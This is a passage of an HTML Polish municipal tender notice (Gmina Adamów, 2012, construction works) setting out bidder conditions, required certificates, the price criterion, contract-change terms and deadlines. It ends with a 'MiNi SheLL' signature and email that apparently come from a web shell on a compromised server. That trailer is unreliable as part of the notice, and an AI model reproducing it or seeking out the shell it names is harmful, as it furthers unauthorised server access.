<ul class="kh_indent_1"><li><p>Ocena dokonana będzie na podstawie treści wymaganych oświadczeń i dokumentów wymaganych i wynikających z SIWZ. Zamawiający dokona oceny spełniania przez wykonawców wymaganych warunków, na zasadzie spełnia-nie spełnia wymaganego warunku. Wykonawcy, którzy nie spełnią wymaganych warunków, zostaną wykluczeni z postępowania, z zastrzeżeniem Art. 26 oraz w powiązaniu z Art.25 ust.1 ustawy. Zostanie sporządzona lista wykonawców na odpowiednich drukach ZP.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena dokonana będzie na podstawie treści wymaganych oświadczeń i dokumentów wymaganych i wynikających z SIWZ. Zamawiający dokona oceny spełniania przez wykonawców wymaganych warunków, na zasadzie spełnia-nie spełnia wymaganego warunku. Wykonawcy, którzy nie spełnią wymaganych warunków, zostaną wykluczeni z postępowania, z zastrzeżeniem Art. 26 oraz w powiązaniu z Art.25 ust.1 ustawy. Zostanie sporządzona lista wykonawców na odpowiednich drukach ZP.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena dokonana będzie na podstawie treści wymaganych oświadczeń i dokumentów wymaganych i wynikających z SIWZ. Zamawiający dokona oceny spełniania przez wykonawców wymaganych warunków, na zasadzie spełnia-nie spełnia wymaganego warunku. Wykonawcy, którzy nie spełnią wymaganych warunków, zostaną wykluczeni z postępowania, z zastrzeżeniem Art. 26 oraz w powiązaniu z Art.25 ust.1 ustawy. Zostanie sporządzona lista wykonawców na odpowiednich drukach ZP.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena dokonana będzie na podstawie treści wymaganych oświadczeń i dokumentów wymaganych i wynikających z SIWZ. Zamawiający dokona oceny spełniania przez wykonawców wymaganych warunków, na zasadzie spełnia-nie spełnia wymaganego warunku. Wykonawcy, którzy nie spełnią wymaganych warunków, zostaną wykluczeni z postępowania, z zastrzeżeniem Art. 26 oraz w powiązaniu z Art.25 ust.1 ustawy. Zostanie sporządzona lista wykonawców na odpowiednich drukach ZP.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena dokonana będzie na podstawie treści wymaganych oświadczeń i dokumentów wymaganych i wynikających z SIWZ. Zamawiający dokona oceny spełniania przez wykonawców wymaganych warunków, na zasadzie spełnia-nie spełnia wymaganego warunku. Wykonawcy, którzy nie spełnią wymaganych warunków, zostaną wykluczeni z postępowania, z zastrzeżeniem Art. 26 oraz w powiązaniu z Art.25 ust.1 ustawy. Zostanie sporządzona lista wykonawców na odpowiednich drukach ZP.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z europejskimi normami zarządzania środowiskiem, jeżeli zamawiający wskazują środki zarządzania środowiskiem, które wykonawca będzie stosował podczas realizacji zamówienia na roboty budowlane lub usługi, odwołując się do systemu zarządzania środowiskiem i audytu (EMAS) lub norm zarządzania środowiskiem opartych na europejskich lub międzynarodowych normach poświadczonych przez podmioty działające zgodnie z prawem Unii Europejskiej, europejskimi lub międzynarodowymi normami dotyczącymi certyfikacji</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Postanowienia umowy zawarto we wzorze umowy, który stanowi załącznik Nr 9
	2. Zapisy Art. 144 ust.1 ustawy stosuje się odpowiednio, a mają zastosowanie wyłącznie w 	formie pisemnej pod rygorem jej nieważności, zawartej pomiędzy zamawiającym a 	wykonawcą z zastosowaniem dla;
2.1. zmiana wynagrodzenia, 
2.2. zmiana terminu wykonania prac,
2.3. pozostałe ustalenia.
Ad.2.1
2.1.1. Zamawiający przewiduje możliwość zmiany wysokości wynagrodzenia w przypadku, kiedy dokumentacja przekazana Wykonawcy zawiera błędy i ma bezpośredni wpływ na koszt wykonania powierzonego zadania inwestycyjnego objętego niniejszym postępowaniem przetargowym.
2.1.2. Zwiększenie wynagrodzenia zamawiający przewiduje w sytuacji wystąpienia okoliczności, których nie można było przewidzieć w chwili podpisania umowy o wykonanie przedmiotu zamówienia w związku z niniejszym postępowaniem przetargowym. Powyższe może nastąpić jedynie w przypadku zwrócenia się wykonawcy do zamawiającego na piśmie wraz z uzasadnieniem oraz przedłożenia jednocześnie kosztorysu obejmującego zakres prac dodatkowych na nośnikach stanowiących podstawę złożonego kosztorysu ofertowego. Na powyższa czynność zamawiający w porozumieniu z inspektorem nadzoru działającym z jego ramienia, podejmie decyzję, o czym powiadomi zamawiającego.
 2.1.3. Zamawiający przewiduje ewentualne podwyższenie wynagrodzenia związanego z ze 	zwiększeniem prac a opartego na zapisach Art.67ust.1 pkt.6 ustawy Pzp
2.1.4. Wynagrodzenie należne dla wykonawcy może ulec zmniejszeniu na podstawie kosztorysu 	powykonawczego.
Ad.2.2
2.2.1.Wykonawca za pisemnym zajęciem pozytywnego stanowiska na wniosek zamawiającego, może ubiegać się o zmianę terminu wykonania zamówienia
2.2.2. W sytuacjach, których nie można było przewidzieć w chwili niniejszego postępowania przetargowego, dopuszcza się zmianę terminu wykonania umowy w innym zakresie jak wskazano w pkt. 5.2.1.- zwłaszcza, gdy zmiana wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, tj. w przypadku wykonywania zamówienia dodatkowego, siły wyższej. Przez siłę wyższą zamawiający rozumie; warunki atmosferyczne uniemożliwiające wykonywanie terminowe prac, 
Ad.2.3; 
2.3.1.Wyjątkowo bez umowy, dopuszczalne jest wykonanie robót (które wykraczają poza zakres umowny) koniecznych dla natychmiastowego zabezpieczenia wykonywanego obiektu lub robót przed awarią czy katastrofą grożącym bezpieczeństwu budowli, lub pilnego wykonania robót koniecznych dla zapewnienia bezpieczeństwa zatrudnionych pracowników dla uchylenia zagrożenia dla życia lub zdrowia- dokonywane są na podstawie wpisu do dziennika budowy tylko wtedy może być podstawą wykonania robót nieobjętych umową, jeżeli są one niezbędne ze względu na bezpieczeństwo lub zabezpieczenie przed awarią.
	Fakt taki musi być zgłoszony zamawiającemu w formie pisemnej z jednoczesnym powiadomieniem inspektora nadzoru działającemu z ramienia zamawiającego w branży dla której powyższy fakt ma miejsce.
2.3.2. W każdej chwili w formie pisemnej akceptacji przez zamawiającego może dojść do zmiany osób nadzorujących wykonanie powierzonego zadania ze strony wykonawcy, czynność taką wykonawca musi uwzględnić na min. 3 dni przed zmianą takiej osoby.
2.3.3. Zawierane umowy w sprawach zamówień publiczny zgodnie z postanowieniami Art. 139 ustawy stosuje się przepisy ustawy z dnia 23 kwietnia 1964 r. Kodeksu cywilnego, wobec powyższego zamawiający dopuszcza zmiany zawartej umowy mające bezpośredni wpływ na jej ważność tylko w przypadku zmian regulacji prawnych obowiązujących po dniu podpisania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.adamow.bip.mbnet.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Adamów, Adamów 11b, 22-442 Adamów - pokój nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2012 godzina 13:00, miejsce: Urząd Gminy Adamów, Adamów 11b, 22-442 Adamów - pokój nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com